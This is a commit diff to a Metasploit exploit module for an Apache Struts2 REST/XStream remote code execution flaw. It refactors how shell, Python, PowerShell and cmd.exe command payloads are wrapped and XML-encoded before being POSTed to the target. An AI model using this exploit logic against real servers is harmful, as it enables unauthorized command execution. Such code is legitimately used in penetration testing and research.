Assign cmd to entire case and use encode for XML

Hat tip @acammack-r7. Forgot about that first syntax!

Author: wvu

modules/exploits/multi/http/struts2_rest_xstream.rb

@@ -86,21 +86,19 @@ def exploit
   #
 
   def execute_command(cmd, opts = {})
-    case target.name
+    cmd = case target.name
     when /Unix/, /Linux/
-      cmd = %W{/bin/sh -c #{cmd}}
+      %W{/bin/sh -c #{cmd}}
     when /Python/
-      cmd = %W{python -c #{cmd}}
+      %W{python -c #{cmd}}
     when /PowerShell/
-      # This shit doesn't work yet
-      require 'pry'; binding.pry
-      cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
     when /Windows/
-      cmd = %W{cmd.exe /c #{cmd}}
+      %W{cmd.exe /c #{cmd}}
     end
 
-    # Encode each command argument with HTML entities
-    cmd.map! { |arg| Rex::Text.html_encode(arg) }
+    # Encode each command argument with XML entities
+    cmd.map! { |arg| arg.encode(xml: :text) }
 
     res = send_request_cgi(
       'method' => 'POST',